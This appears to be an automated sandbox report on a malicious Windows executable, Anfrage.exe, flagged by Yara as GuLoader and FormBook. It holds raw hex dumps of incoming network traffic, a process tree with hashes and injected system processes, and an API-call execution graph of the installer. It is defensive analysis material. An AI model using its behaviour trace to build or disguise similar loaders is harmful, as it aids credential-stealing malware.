2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: 68 d1 54 58 6b 1e 75 1b 3a 6d 45 fc bc a6 5b d2 9c c4 c8 50 89 46 c2 42 c5 a9 dd 8b ec 18 6c c6 4a 72 a6 7f 99 a8 d6 5d d5 98 21 ea d4 0d 02 ad dc 12 b9 4d 9f e0 1b b7 3c ad a0 f1 5f c2 e5 40 00 b8 fd e0 79 6d 80 c6 ee 7a cc 69 fd 00 a9 33 87 ce bb 94 55 66 d2 f4 ba 86 fa 6e ba ba f4 62 43 7a 38 92 08 06 d4 db d7 64 e1 25 8c 2f ec 2a 38 1a 2d 98 2a de e6 6e b1 ed f3 55 06 9d e0 e7 51 bc 8f f8 5e 08 ec f9 33 8a 64 ce 34 4d 4d 9b 84 3f f9 28 14 7d 93 41 4a aa df c0 ad 5e 67 0a b7 b2 78 b8 2b c0 60 82 ef 55 69 df 72 7c 85 56 1e f6 b9 4d 1c b8 94 13 d2 1a df d1 37 5d c1 c2 61 56 79 47 31 90 84 c0 16 eb 50 2c a6 fe ba 5a f3 36 be 55 73 d7 ef 32 72 9f 37 4a 85 a3 e3 b0 6b 5a 08 07 31 eb 70 07 f5 f1 7a 89 8b 30 33 cf 77 fa 9f e3 e7 ab 40 56 11 a3 bf 77 ab 20 34
Data Ascii: hTXku:mE[PFBlJr]!M<_@ymzi3UfnbCz8d%/*8-*nUQ^3d4MM?(}AJ^gx+`Uir|VM7]aVyG1P,Z6Us2r7JkZ1pz03w@Vw 4
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: 1e 56 20 06 7d 17 fc 00 70 54 2d 70 1d 8d c5 95 1f a1 49 f6 60 60 80 10 14 2b e9 20 85 2c 2a 81 19 4d e3 23 d8 41 b1 9a 65 d2 26 2c fb eb 8e 5b c3 b8 c0 c5 73 5e 25 0b dc 2d aa be 10 1c 93 ab 50 ef 47 8c 9a 78 07 ba 1d 59 e3 e3 e2 cc 42 39 f7 b0 5c 16 9a c6 08 f7 93 ba 86 94 a8 9b 7c b7 b3 76 6f c4 e5 d8 6e ac 63 4c 22 b9 76 30 76 e8 cb fc 02 07 19 69 0e 1c 0d 08 4b 7d 09 61 b8 4b 93 9c 53 9a 46 3a bb 8b e4 90 fa 75 4c 56 aa d4 3a 56 24 2a 41 3f 0c 62 45 6c 95 cb 0c c5 44 25 9b 08 9f b0 3f db 70 50 aa 0c 3e 0a 37 5a 0d f0 fa de a1 61 3c bd 76 9c 7a 42 b9 e7 8e 03 d9 b7 2e b9 76 c1 86 7c c1 e1 1d 8e 91 39 09 64 10 18 30 8f 02 84 92 07 95 77 ae d0 5c 2f cc eb 8b c6 7c f3 f3 8a bd de 92 28 9d f9 60 75 37 de cb 70 55 34 54 00 5d 27 fc b9 00 51 34 12 92 b7 5b
Data Ascii: V }pT-pI``+ ,*M#Ae&,[s^%-PGxYB9\|voncL"v0viK}aKSF:uLV:V$*A?bElD%?pP>7Za<vzB.v|9d0w\/|(`u7pU4T]'Q4[
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: a5 7a 85 49 16 97 cd b3 dd fb 75 39 98 18 3e 4f 3a c8 99 13 54 3b 92 11 61 10 37 ad 3d e1 34 50 1e c1 72 9f 17 ec 5c d4 83 fb dd 13 9c 06 d8 00 1b d3 0a 2c bf e8 eb 24 b3 f8 79 d5 37 fd a1 ba ae 78 9e 11 fc b3 d3 d1 ae 86 d8 48 b8 b7 0c c7 ed c2 1b 4c 48 66 d4 87 cd 35 21 fd d1 98 32 fc 1f 4b 18 e3 38 1a aa 6e 28 27 fa 5e a4 d3 26 6a e9 0d 46 36 91 8f 4a a6 51 10 64 1b d6 a1 89 43 1b c6 50 06 ef 71 ab 29 25 0c 5a d1 ee 63 84 c8 6f 76 c1 2c c7 62 ec ba 2d da d7 56 42 a2 69 b9 cb 30 45 dc 79 3f c1 e1 b4 ae 36 4e 3d 5a b6 dc 97 27 e6 4e 4e 1c d3 6c 40 cd ab d7 72 df 6d 3a 53 6e 7c 2e e8 cc c4 6a 0d 11 f9 f9 2a 76 d0 bf 61 b6 99 84 54 7b 61 a4 33 41 4c 88 55 e3 e1 6c 1d 03 df 86 cd f0 8a fe 93 b9 10 7f 2e 34 d8 90 97 95 1e 6f 86 20 df 65 4e 64 88 8f 35 3d 68
Data Ascii: zIu9>O:T;a7=4Pr\,$y7xHLHf5!2K8n('^&jF6JQdCPq)%Zcov,b-VBi0Ey?6N=Z'NNl@rm:Sn|.j*vaT{a3ALUl.4o eNd5=h
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: fd 30 f6 34 f3 e2 9a 3a fe 2c 8a 1f da 50 c5 2e 0f cb 1c ac d0 c7 c7 b9 21 76 ae d7 07 13 ca 6c 84 8c 2e 89 5a 5b 7a 53 d5 2c 1e 56 30 d8 f4 21 80 be 5f 54 57 8e 01 ed b0 12 bf dc bf 90 e5 17 3c c4 23 9c 97 fe 79 94 15 4e 51 45 e2 29 89 19 49 49 dc 47 02 64 a6 d4 0f 0e f2 5f b4 1b 1e e6 d4 03 4a 78 71 57 cb b5 58 30 de 33 51 64 82 59 63 1c b7 1c 97 d7 6e 19 2d 5b 14 47 d3 0b a3 bc 60 d8 e7 54 22 a8 80 d3 02 00 a7 cc 71 4d fe 70 92 29 95 ad e8 f7 ca c5 70 0a 03 c0 01 a7 78 85 df 3a fd f9 d1 9f 49 86 2f 8c ab 59 05 e3 7b e8 22 cc ad 1f 82 37 59 a6 8c 7c 69 a5 9b dc 9d cf a7 9b ae 92 62 b5 aa e4 2a 29 c9 e4 ac 9b 31 68 3d 97 bf b9 32 20 d4 b4 04 66 f2 2c c6 4b b0 c2 42 e5 49 7a 10 10 5a 1a 76 3b 97 d1 c5 ec 84 df 51 da d2 ec ee b9 1b 8e ab cc d7 d6 2f bf a4
Data Ascii: 04:,P.!vl.Z[zS,V0!_TW<#yNQE)IIGd_JxqWX03QdYcn-[G`T"qMp)px:I/Y{"7Y|ib*)1h=2 f,KBIzZv;Q/
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: a7 c8 07 85 ab 25 f3 07 50 bb 3b ac 63 c1 d9 84 e0 6b b0 a0 b1 8c a0 86 7f a3 01 4e cf 5f 98 12 4e d0 4c 99 76 a6 81 1e 80 ab 19 7b 1b 01 2a 42 28 d0 43 3b ca c4 f5 56 ee ce 1a cf 53 21 b4 e3 98 c0 d9 ec 36 77 35 a5 a0 dc 2a ea 72 96 06 6a b2 eb 4d 98 11 1f 8a 12 8f c8 d5 a7 d3 87 bd f4 97 33 30 1c e9 db 16 a6 5e 7d fd 04 97 83 7a 9c 8b 2c 53 b8 aa b0 bb 6f 17 2b 98 64 12 92 b8 6c e2 30 98 b0 ec e8 b4 b8 7c 3a 63 ed c2 1d 23 fa ff 00 cf 3f d2 8d e2 5f 5e 60 75 30 f7 af d0 bc 7d 64 40 71 bc 68 a6 dc 10 38 13 b6 22 2b b4 d5 20 9b 37 3f 27 ac 5c f3 47 69 00 a9 15 c4 4b 0c c0 c5 2a 94 b9 d7 5b df 6d 85 e0 76 1b fa 8e bd 16 b3 ef 59 6e d3 3e de 35 76 64 b3 2e 58 15 10 50 ee 7f 47 14 b4 6d 5e df 3c 8a 9a 55 87 1d a0 86 4e 0b 41 f9 04 4e 1d f4 ec b0 e6 c5 dd 8e
Data Ascii: %P;ckN_NLv{*B(C;VS!6w5*rjM30^}z,So+dl0|:c#?_^`u0}d@qh8"+ 7?'\GiK*[mvYn>5vd.XPGm^<UNAN
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: cf b4 f0 59 83 7a d2 b6 5f 5e 20 85 66 55 20 c2 1f 32 b2 72 2a 0c 25 7c 1b fb f0 d7 fd 68 35 d7 74 66 5d 78 2c 42 ab 49 77 94 b2 dd 99 4b 1e 4e 11 bb 0d 96 c2 e3 c1 1a 44 86 31 e1 d5 23 da 93 af 8e 6c b2 7b 37 10 35 27 59 c7 f4 bb 37 72 58 fb 03 d9 6d a5 ff 0f b8 dd 25 12 51 79 65 55 50 16 1d d2 7b d1 97 9e 5f 0d c0 dd 03 46 04 26 26 a7 7d 8e cb 86 20 f2 4a bb c8 8c f0 88 1a 02 45 74 fe c0 c7 03 aa 35 b0 ed 62 83 e9 82 eb c6 61 47 e7 a4 c7 b9 a5 3f 05 b0 d5 43 d6 36 6a 9a b9 6d 46 91 58 e7 61 b9 9f 47 f8 7d 95 ed 40 51 85 5a 6a 5f 76 50 cc bd 6b 89 4c ee 61 be 3f ef e4 dd ac 5c 5f ea 75 fc 11 fc c5 49 a9 38 eb 59 77 05 c7 61 98 c1 81 dd 51 85 20 9b 8d 6f bd 9b 6a 07 31 a8 bb c3 52 11 65 82 c6 e8 13 4b ae cb 8c 37 dd cf cc d2 b7 22 3c 26 46 9d 51 66 97 a7
Data Ascii: Yz_^ fU 2r*%|h5tf]x,BIwKND1#l{75'Y7rXm%QyeUP{_F&&} JEt5baG?C6jmFXaG}@QZj_vPkLa?\_uI8YwaQ oj1ReK7"<&FQf
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: 81 fb 0b 5e 98 7a c7 bf 51 36 68 c3 aa 33 5e 49 a0 92 ee 0c a6 fc 97 0c a1 0f 94 c6 cf 0b c9 62 33 1c bd 74 da 0c a0 b2 31 fe 3a ed 2d fe f8 ac 1d 2b 4d b6 ef f2 66 c1 96 2e 53 82 bd cf 9d f0 b6 48 e8 23 a2 16 df 57 ae b5 fc 4b 5f eb 67 a7 46 b0 e6 32 00 56 e4 76 a9 39 24 f2 d2 e4 e9 d3 e3 47 63 37 2d ed 4f e9 2f 60 9e 9e 83 1e ff 0c 7c d4 9b c7 72 79 52 a1 d9 75 e6 b4 7e c4 bb 18 68 32 f8 4f 35 30 97 21 62 71 f0 e9 ad a2 5d 1b 4d 2c 9e 79 17 be e7 2e b8 c0 4a fe 42 be 11 60 68 c1 9e d7 13 cf 8e 23 71 4f d3 d0 80 6f 22 f5 2f e0 cc 73 30 14 11 fb cf a7 ef 8f c9 0b 51 c7 bb 2a 46 03 ce 59 59 50 a9 e5 2b 20 ac 5c 3d a3 3f 0a 69 a6 6e ba f8 45 d3 84 b3 6c 33 d5 1c 41 4a 3a 3d 91 59 a0 31 d2 c1 74 86 9a f7 c3 e0 af 36 54 a2 94 00 05 58 49 40 55 ae 18 76 00 cc
Data Ascii: ^zQ6h3^Ib3t1:-+Mf.SH#WK_gF2Vv9$Gc7-O/`|ryRu~h2O50!bq]M,y.JB`h#qOo"/s0Q*FYYP+ \=?inEl3AJ:=Y1t6TXI@Uv

Target ID: 0
Start time: 06:03:15
Start date: 11/11/2024
Path: C:\Users\user\Desktop\Anfrage.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Anfrage.exe"
Imagebase: 0x400000
File size: 1'251'520 bytes
MD5 hash: 71EA800A6B7644BE75507E3B74E3CCE2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2122397614.00000000034FA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 7
Start time: 06:04:27
Start date: 11/11/2024
Path: C:\Users\user\Desktop\Anfrage.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Anfrage.exe"
Imagebase: 0x400000
File size: 1'251'520 bytes
MD5 hash: 71EA800A6B7644BE75507E3B74E3CCE2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2476095227.00000000020FA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 8
Start time: 06:04:55
Start date: 11/11/2024
Path: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe"
                                                                        Imagebase:0xed0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:9
                                                                        Start time:06:04:56
                                                                        Start date:11/11/2024
                                                                        Path:C:\Windows\SysWOW64\ktmutil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                                        Imagebase:0x880000
                                                                        File size:15'360 bytes
                                                                        MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:11
                                                                        Start time:06:05:09
                                                                        Start date:11/11/2024
                                                                        Path:C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe"
                                                                        Imagebase:0xed0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false


                                                                          Execution Graph

                                                                          Execution Coverage:22.5%
                                                                          Dynamic/Decrypted Code Coverage:14.3%
                                                                          Signature Coverage:21.5%
                                                                          Total number of Nodes:1472
                                                                          Total number of Limit Nodes:46
                                                                          execution_graph: [node and edge data of the interactive execution graph; not reproduced in text form]
RegOpenKeyExA 3675->3697 3702 405d21 wsprintfA 3675->3702 3703 405dc3 lstrcpynA 3675->3703 3676->3675 3679->3676 3680->3675 3682->3675 3683->3675 3684->3675 3687 405f6a SHGetPathFromIDListA CoTaskMemFree 3684->3687 3685->3675 3686->3675 3687->3675 3689 40603a 3688->3689 3691 406097 CharNextA 3689->3691 3693 4060a2 3689->3693 3695 406085 CharNextA 3689->3695 3696 406092 CharNextA 3689->3696 3705 405860 3689->3705 3690 4060a6 CharPrevA 3690->3693 3691->3689 3691->3693 3693->3690 3694 4060c1 3693->3694 3694->3667 3695->3689 3696->3691 3698 405d1b 3697->3698 3699 405cdd RegQueryValueExA 3697->3699 3698->3675 3700 405cfe RegCloseKey 3699->3700 3700->3698 3702->3675 3703->3675 3704->3672 3706 405866 3705->3706 3707 405879 3706->3707 3708 40586c CharNextA 3706->3708 3707->3689 3708->3706 5117 100029c3 5118 100029db 5117->5118 5119 10001534 2 API calls 5118->5119 5120 100029f6 5119->5120 5121 401c04 5122 402aac 18 API calls 5121->5122 5123 401c0b 5122->5123 5124 402aac 18 API calls 5123->5124 5125 401c18 5124->5125 5126 402ace 18 API calls 5125->5126 5128 401c2d 5125->5128 5126->5128 5127 401c3d 5130 401c94 5127->5130 5131 401c48 5127->5131 5128->5127 5129 402ace 18 API calls 5128->5129 5129->5127 5132 402ace 18 API calls 5130->5132 5133 402aac 18 API calls 5131->5133 5134 401c99 5132->5134 5135 401c4d 5133->5135 5136 402ace 18 API calls 5134->5136 5137 402aac 18 API calls 5135->5137 5139 401ca2 FindWindowExA 5136->5139 5138 401c59 5137->5138 5140 401c84 SendMessageA 5138->5140 5141 401c66 SendMessageTimeoutA 5138->5141 5142 401cc0 5139->5142 5140->5142 5141->5142 4188 40270b 4189 402ace 18 API calls 4188->4189 4190 402712 FindFirstFileA 4189->4190 4191 402735 4190->4191 4192 402725 4190->4192 4193 40273c 4191->4193 4196 405d21 wsprintfA 4191->4196 4197 405dc3 lstrcpynA 4193->4197 4196->4193 4197->4192 5143 401490 5144 404fdc 25 API calls 5143->5144 5145 401497 5144->5145 5146 402590 5147 402595 5146->5147 5148 4025a9 5146->5148 5149 402aac 18 API calls 5147->5149 5150 
402ace 18 API calls 5148->5150 5152 40259e 5149->5152 5151 4025b0 lstrlenA 5150->5151 5151->5152 5153 405add WriteFile 5152->5153 5154 4025d2 5152->5154 5153->5154 5155 402c13 5156 402c22 SetTimer 5155->5156 5157 402c3b 5155->5157 5156->5157 5158 402c90 5157->5158 5159 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5157->5159 5159->5158 4366 402695 4367 40269c 4366->4367 4369 40290b 4366->4369 4368 402aac 18 API calls 4367->4368 4370 4026a3 4368->4370 4371 4026b2 SetFilePointer 4370->4371 4371->4369 4372 4026c2 4371->4372 4374 405d21 wsprintfA 4372->4374 4374->4369 5160 401d95 GetDC 5161 402aac 18 API calls 5160->5161 5162 401da7 GetDeviceCaps MulDiv ReleaseDC 5161->5162 5163 402aac 18 API calls 5162->5163 5164 401dd8 5163->5164 5165 405de5 18 API calls 5164->5165 5166 401e15 CreateFontIndirectA 5165->5166 5167 40258a 5166->5167 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 100014bb GlobalFree 5170->5171 5172 10001091 5170->5172 5171->5172 5173 100014bb GlobalFree 5172->5173 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5179 100010c6 5175->5179 5176->5175 5178 100014e2 3 API calls 5177->5178 5178->5179 5180 100010d1 GlobalFree 5179->5180 5180->5169 5181 40511a 5182 4052c5 5181->5182 5183 40513c GetDlgItem GetDlgItem GetDlgItem 5181->5183 5185 4052f5 5182->5185 5186 4052cd GetDlgItem CreateThread CloseHandle 5182->5186 5226 403fdd SendMessageA 5183->5226 5187 405323 5185->5187 5188 405344 5185->5188 5189 40530b ShowWindow ShowWindow 5185->5189 5186->5185 5191 40537e 5187->5191 5193 405333 5187->5193 5194 405357 ShowWindow 5187->5194 5195 40400f 8 API calls 5188->5195 5228 403fdd SendMessageA 5189->5228 5190 4051ac 5196 4051b3 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5190->5196 5191->5188 5199 40538b SendMessageA 5191->5199 5200 403f81 SendMessageA 5193->5200 5202 405377 5194->5202 5203 405369 5194->5203 5201 405350 5195->5201 5197 405221 
5196->5197 5198 405205 SendMessageA SendMessageA 5196->5198 5204 405234 5197->5204 5205 405226 SendMessageA 5197->5205 5198->5197 5199->5201 5206 4053a4 CreatePopupMenu 5199->5206 5200->5188 5208 403f81 SendMessageA 5202->5208 5207 404fdc 25 API calls 5203->5207 5210 403fa8 19 API calls 5204->5210 5205->5204 5209 405de5 18 API calls 5206->5209 5207->5202 5208->5191 5211 4053b4 AppendMenuA 5209->5211 5212 405244 5210->5212 5213 4053d2 GetWindowRect 5211->5213 5214 4053e5 TrackPopupMenu 5211->5214 5215 405281 GetDlgItem SendMessageA 5212->5215 5216 40524d ShowWindow 5212->5216 5213->5214 5214->5201 5217 405401 5214->5217 5215->5201 5219 4052a8 SendMessageA SendMessageA 5215->5219 5218 405263 ShowWindow 5216->5218 5221 405270 5216->5221 5220 405420 SendMessageA 5217->5220 5218->5221 5219->5201 5220->5220 5222 40543d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5220->5222 5227 403fdd SendMessageA 5221->5227 5224 40545f SendMessageA 5222->5224 5224->5224 5225 405481 GlobalUnlock SetClipboardData CloseClipboard 5224->5225 5225->5201 5226->5190 5227->5215 5228->5187 5229 401d1a 5230 402aac 18 API calls 5229->5230 5231 401d28 SetWindowLongA 5230->5231 5232 40295e 5231->5232 4538 40159d 4539 402ace 18 API calls 4538->4539 4540 4015a4 SetFileAttributesA 4539->4540 4541 4015b6 4540->4541 5238 40149d 5239 4014ab PostQuitMessage 5238->5239 5240 4022dd 5238->5240 5239->5240 4542 401a1e 4543 402ace 18 API calls 4542->4543 4544 401a27 ExpandEnvironmentStringsA 4543->4544 4545 401a3b 4544->4545 4546 401a4e 4544->4546 4545->4546 4547 401a40 lstrcmpA 4545->4547 4547->4546 4726 40171f 4727 402ace 18 API calls 4726->4727 4728 401726 SearchPathA 4727->4728 4729 401741 4728->4729 5241 40439f 5242 4043d5 5241->5242 5243 4043af 5241->5243 5245 40400f 8 API calls 5242->5245 5244 403fa8 19 API calls 5243->5244 5246 4043bc SetDlgItemTextA 5244->5246 5247 4043e1 5245->5247 5246->5242 5248 100010e0 5257 1000110e 5248->5257 5249 100011c4 GlobalFree 5250 100012ad 2 API calls 5250->5257 
5251 100011c3 5251->5249 5252 100011ea GlobalFree 5252->5257 5253 10001266 2 API calls 5256 100011b1 GlobalFree 5253->5256 5254 10001155 GlobalAlloc 5254->5257 5255 100012d1 lstrcpyA 5255->5257 5256->5257 5257->5249 5257->5250 5257->5251 5257->5252 5257->5253 5257->5254 5257->5255 5257->5256 5258 10002162 5259 100021c0 5258->5259 5261 100021f6 5258->5261 5260 100021d2 GlobalAlloc 5259->5260 5259->5261 5260->5259 3709 4031a3 SetErrorMode GetVersion 3710 4031da 3709->3710 3711 4031e0 3709->3711 3712 40615c 5 API calls 3710->3712 3797 4060ee GetSystemDirectoryA 3711->3797 3712->3711 3714 4031f6 lstrlenA 3714->3711 3715 403205 3714->3715 3800 40615c GetModuleHandleA 3715->3800 3718 40615c 5 API calls 3719 403214 #17 OleInitialize SHGetFileInfoA 3718->3719 3806 405dc3 lstrcpynA 3719->3806 3721 403251 GetCommandLineA 3807 405dc3 lstrcpynA 3721->3807 3723 403263 GetModuleHandleA 3724 40327a 3723->3724 3725 405860 CharNextA 3724->3725 3726 40328e CharNextA 3725->3726 3734 40329e 3726->3734 3727 403368 3728 40337b GetTempPathA 3727->3728 3808 403172 3728->3808 3730 403393 3731 403397 GetWindowsDirectoryA lstrcatA 3730->3731 3732 4033ed DeleteFileA 3730->3732 3735 403172 12 API calls 3731->3735 3818 402cfa GetTickCount GetModuleFileNameA 3732->3818 3733 405860 CharNextA 3733->3734 3734->3727 3734->3733 3739 40336a 3734->3739 3738 4033b3 3735->3738 3737 403401 3742 403487 3737->3742 3746 405860 CharNextA 3737->3746 3793 403497 3737->3793 3738->3732 3741 4033b7 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3738->3741 3913 405dc3 lstrcpynA 3739->3913 3744 403172 12 API calls 3741->3744 3846 403743 3742->3846 3748 4033e5 3744->3748 3749 40341c 3746->3749 3748->3732 3748->3793 3756 403462 3749->3756 3757 4034c7 3749->3757 3750 4034b1 3937 4055b9 3750->3937 3751 4035cf 3753 403651 ExitProcess 3751->3753 3754 4035d7 GetCurrentProcess OpenProcessToken 3751->3754 3759 403622 3754->3759 3760 4035f2 LookupPrivilegeValueA AdjustTokenPrivileges 3754->3760 3914 
405923 3756->3914 3902 40553c 3757->3902 3763 40615c 5 API calls 3759->3763 3760->3759 3764 403629 3763->3764 3767 40363e ExitWindowsEx 3764->3767 3770 40364a 3764->3770 3767->3753 3767->3770 3768 4034e8 lstrcatA lstrcmpiA 3772 403504 3768->3772 3768->3793 3769 4034dd lstrcatA 3769->3768 3950 40140b 3770->3950 3773 403510 3772->3773 3774 403509 3772->3774 3946 40551f CreateDirectoryA 3773->3946 3941 4054a2 CreateDirectoryA 3774->3941 3776 40347c 3929 405dc3 lstrcpynA 3776->3929 3781 403515 SetCurrentDirectoryA 3782 403524 3781->3782 3783 40352f 3781->3783 3949 405dc3 lstrcpynA 3782->3949 3905 405dc3 lstrcpynA 3783->3905 3786 40353d 3787 405de5 18 API calls 3786->3787 3790 4035c3 3786->3790 3794 405de5 18 API calls 3786->3794 3796 4035af CloseHandle 3786->3796 3906 405c7e MoveFileExA 3786->3906 3910 405554 CreateProcessA 3786->3910 3788 40356e DeleteFileA 3787->3788 3788->3786 3789 40357b CopyFileA 3788->3789 3789->3786 3792 405c7e 38 API calls 3790->3792 3792->3793 3930 403669 3793->3930 3794->3786 3796->3786 3798 406110 wsprintfA LoadLibraryExA 3797->3798 3798->3714 3801 406182 GetProcAddress 3800->3801 3802 406178 3800->3802 3803 40320d 3801->3803 3804 4060ee 3 API calls 3802->3804 3803->3718 3805 40617e 3804->3805 3805->3801 3805->3803 3806->3721 3807->3723 3809 40602e 5 API calls 3808->3809 3810 40317e 3809->3810 3811 403188 3810->3811 3953 405835 lstrlenA CharPrevA 3810->3953 3811->3730 3814 40551f 2 API calls 3815 403196 3814->3815 3956 405a65 3815->3956 3960 405a36 GetFileAttributesA CreateFileA 3818->3960 3820 402d3a 3839 402d4a 3820->3839 3961 405dc3 lstrcpynA 3820->3961 3822 402d60 3962 40587c lstrlenA 3822->3962 3826 402d71 GetFileSize 3827 402e6d 3826->3827 3841 402d88 3826->3841 3967 402c96 3827->3967 3829 402e76 3831 402ea6 GlobalAlloc 3829->3831 3829->3839 4002 40315b SetFilePointer 3829->4002 3978 40315b SetFilePointer 3831->3978 3834 402ed9 3836 402c96 6 API calls 3834->3836 3835 402ec1 3979 402f33 3835->3979 3836->3839 3837 402e8f 3840 403145 
ReadFile 3837->3840 3839->3737 3843 402e9a 3840->3843 3841->3827 3841->3834 3841->3839 3842 402c96 6 API calls 3841->3842 3999 403145 3841->3999 3842->3841 3843->3831 3843->3839 3844 402ecd 3844->3839 3844->3844 3845 402f0a SetFilePointer 3844->3845 3845->3839 3847 40615c 5 API calls 3846->3847 3848 403757 3847->3848 3849 40375d 3848->3849 3850 40376f 3848->3850 4032 405d21 wsprintfA 3849->4032 3851 405caa 3 API calls 3850->3851 3852 40379a 3851->3852 3854 4037b8 lstrcatA 3852->3854 3856 405caa 3 API calls 3852->3856 3855 40376d 3854->3855 4023 403a08 3855->4023 3856->3854 3859 405923 18 API calls 3860 4037ea 3859->3860 3861 403873 3860->3861 3864 405caa 3 API calls 3860->3864 3862 405923 18 API calls 3861->3862 3863 403879 3862->3863 3866 403889 LoadImageA 3863->3866 3867 405de5 18 API calls 3863->3867 3865 403816 3864->3865 3865->3861 3870 403832 lstrlenA 3865->3870 3874 405860 CharNextA 3865->3874 3868 4038b0 RegisterClassA 3866->3868 3869 40392f 3866->3869 3867->3866 3871 4038e6 SystemParametersInfoA CreateWindowExA 3868->3871 3872 403939 3868->3872 3873 40140b 2 API calls 3869->3873 3875 403840 lstrcmpiA 3870->3875 3876 403866 3870->3876 3871->3869 3872->3793 3877 403935 3873->3877 3878 403830 3874->3878 3875->3876 3879 403850 GetFileAttributesA 3875->3879 3880 405835 3 API calls 3876->3880 3877->3872 3882 403a08 19 API calls 3877->3882 3878->3870 3881 40385c 3879->3881 3883 40386c 3880->3883 3881->3876 3884 40587c 2 API calls 3881->3884 3885 403946 3882->3885 4033 405dc3 lstrcpynA 3883->4033 3884->3876 3887 403952 ShowWindow 3885->3887 3888 4039d5 3885->3888 3890 4060ee 3 API calls 3887->3890 4034 4050ae OleInitialize 3888->4034 3893 40396a 3890->3893 3891 4039db 3894 4039f7 3891->3894 3895 4039df 3891->3895 3892 403978 GetClassInfoA 3898 4039a2 DialogBoxParamA 3892->3898 3899 40398c GetClassInfoA RegisterClassA 3892->3899 3893->3892 3896 4060ee 3 API calls 3893->3896 3897 40140b 2 API calls 3894->3897 3895->3872 3901 40140b 2 API calls 3895->3901 3896->3892 
